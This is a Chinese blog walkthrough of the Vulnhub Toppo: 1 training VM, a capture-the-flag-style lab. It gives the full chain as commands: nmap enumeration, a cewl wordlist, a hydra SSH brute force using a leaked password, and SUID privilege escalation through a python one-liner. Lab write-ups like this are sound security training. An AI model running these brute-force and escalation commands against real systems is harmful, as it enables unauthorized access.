Vulnhub:Toppo 1靶机

已于 2023-06-07 23:27:07 修改
阅读量88 收藏
点赞数
文章标签: 安全 网络安全 web安全
于 2023-05-02 19:14:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/130466058
版权

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

根据nmap的脚本http-enum收集到的信息,80端口的admin目录存放有notes.txt文件,根据文件内容得到密码:12345ted123

使用cewl收集目标web信息

cewl http://192.168.111.130/admin -w user.txt

利用收集到的信息配合之前的得到的密码爆破ssh,得到用户:ted,密码:12345ted123

hydra -L ./user.txt -p 12345ted123 192.168.111.130 -s 22 ssh -t 64

提权

查找suid权限的文件

find / -perm -u=s -exec ls -al {} \; 2> /dev/null

提权方法:python | GTFOBins

/usr/bin/python2.7 -c 'import os;os.system("/bin/bash -p")'

flag

ctostm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机 Toppo
菜浪马废的博客
04-29 344
找了半天没发现别的东西 就一个密码 看了walkthrough 用户名就是ted 两种方法 内核我没看可不可以 贴个网址 非常好用 传送门
Toppo靶机渗透
weixin_56306210的博客
12-12 338
Toppo靶机渗透
Vulnhub靶机练习——Toppo
weixin_45126664的博客
08-05 950
这是一次靶场练习,使用 kali 和 VulnhubToppo靶机 ,难度属于新手入门 ! 靶机下载地址: 1、https://download.vulnhub.com/toppo/Toppo.zip 2、https://download.vulnhub.com/toppo/Toppo.zip.torrent 知识点: 1、netdiscover发现局域网内靶机IP地址 2、nmap扫描端口、服务、漏洞 3、dirb路径扫描 4、根据发现的端口(服务),尝试相应的探测和攻击 5、cewl搜集页面关
Toppo
weixin_43841336的博客
07-18 198
Nmap -sP 192.168.34.1/24扫描存活主机,确认靶机(192.168.34.156)、 扫描开放端口 访问靶机web并用dirb扫描 在访问admin是发现了密吗 账号猜一下,密码为12345ted123,可以ssh登录了 最后猜到的账号为ted 用scp上传一个脚本并运行 着可以看到可以执行用awk命令 ...
VulnHub-toppo
热门推荐
江左盟的博客
06-11 1万+
信息收集 漏洞发现 漏洞利用 q
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。...Toppo:1 Billu Box 2 基
nessie:NeSSie库和用于分析核酸序列对称性元素的工具
05-10
联络人Michele , 出版物: Michele Berselli,Enrico Lavezzo,Stefano Toppo; NeSSie:用于鉴定近似DNA序列对称性的工具,生物信息学,bty142, //doi.org/10.1093/bioinformatics/bty142从源安装NeSSie文件夹中...
黑客零基础第二章--信息收集第五章-靶机实战Toppo:1
ShadowBlade
08-14 2926
Toppo:1是Vulnhub中easy的一个靶机,仅仅需要简单的信息收集,即可完成intrusion。非常适合我们的这一阶段练习
vulnhubToppo实战攻略
weixin_43862283的博客
04-14 608
vulnhubToppo实战攻略 0x01 前言 作为信息安全中新入围的小白,实战还是很重要的,就从最基础的开始咯!找了Vulnhub中菜鸟中的菜鸟做的,跟大家分享一下。 0x02 环境及配置 Toppo:1 难度 : Beginner 网卡配置:桥接模式 DHCP 下载地址:: https://download.vulnhub.com/toppo/Toppo.zip 0x03 攻击 第一步,...
基于Toppo渗透测试的学习笔记
gaily123的博客
10-09 375
基于Toppo渗透测试的学习笔记 靶机与kali均为NAT模式 kali ip为192.168.79.130 扫描 上nmap扫网段 发现靶机ip为192.168.79.147 扫端口发现22,80,111,42143 进80端口查看,是一个博客 没有什么完善的功能,于是扫后台目录 扫到admin进入发现有一个txt,为以下内容 Note to myself : I need to cha...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
带妹玩转Vulnhub【一】
BadRer的博客
09-27 7497
前言 题目是不想在刷了,想学一学渗透测试的知识。 由于是开头之作,所以会写的比较的详细,尽量让大家少走弯路。 带妹是不可能带妹的,这辈子都不可能带妹的
vulnhub-eric
weixin_43841336的博客
07-18 187
扫描靶机:Nmap -sP 192.168.34.1/24 扫描开放端口:nmap -sV 192.168.34.154 扫描网站:dirb +网址 发现有上传漏洞,git泄露,admin应该是登录框 用工具将git回复 恢复了这几个 在admin.Php发现了账号和密码、 登录以后就可以上传文件了,先上传个shell(大马和 反向都可以) 反弹shell的perl码: perl -e ‘use ...
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装
最新发布
qq_43684686的博客
06-17 88
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装。重新执行安装程安装到 d:\a-vm。在D盘新建一个文件夹a-vm,
MVC 框架安全
A526847的博客
06-17 458
举例来说,在“注入攻击”一章中,我们并没有使用 PHP 的 magic_quotes_gpc 作为一项 对抗 SQL 注入的防御方案,这是因为 magic_quotes_gpc 是有缺陷的,它并没有在正确的地方 解决问题。其次,对于一些常见的漏洞来说,由程序员一个个修补可能会出现遗漏,而在框架中统一 解决,有可能解决“遗漏”的问题。最后,在每个业务里修补安全漏洞,补丁的标准难以统一,而在框架中集中实施的安全方 案,可以使所有基于框架开发的业务都能受益,从安全方案的有效性来说,更容易把握。
如何确保数据跨域交换安全、合规、可追溯性?
文件数据安全交换
06-14 543
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
《软件定义安全》之八:软件定义安全案例
大龄IT民工
06-13 1225
Embrane是一家虚拟设备提供商,由Cisco公司前员工创立,该公司致力于实现网络功能实体的软件化,旨在研发出多服务、分布式软件架构的网络服务产品。它于2015年4月被Cisco公司收购。Embrane的软件定义架构称为Heleos,利用虚拟通信设备代替原有基于专有硬件平台的设备,通过一个集中的控制台对虚拟设备进行管理和控制。Heleos与原来的应用交付网络(ADN)产品较为接近,是基于软件的L4~L7虚拟设备,包括负载均衡产品、防火墙、VPN产品和SSLOffload Engine。
Java中的安全管理器和权限控制
weixin_53840353的博客
06-13 640
Java安全管理器是一种允许应用程序在运行时检查对系统资源(如文件和网络)的访问权限的机制。通过定义和安装自定义的安全策略,程序员可以控制哪些代码能够执行特定的操作,从而保护系统资源的安全。@Override// 自定义安全策略throw new SecurityException("写文件操作被禁止!");try {// 尝试写文件操作System.err.println("安全异常:" + e.getMessage());在这个示例中,自定义的禁止所有文件写操作。
NTFS安全权限
2302_80097039的博客
06-12 756
NTFS权限是基于。
Veeam Backup Enterprise Manager身份验证绕过漏洞(CVE-2024-29849)
lujiawei00的专栏
06-11 586
对于无法立即将 Veeam Backup Enterprise Manager 升级到 12.1.2.172 的客户,可执行以下缓解措施: 1.通过停止 Veeam Backup Enterprise Manager 软件来缓解该漏洞,可停止并禁用以下服务(禁用服务不会阻止安装 12.1.2 更新,但更新后需要将服务重置回自动启动):

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值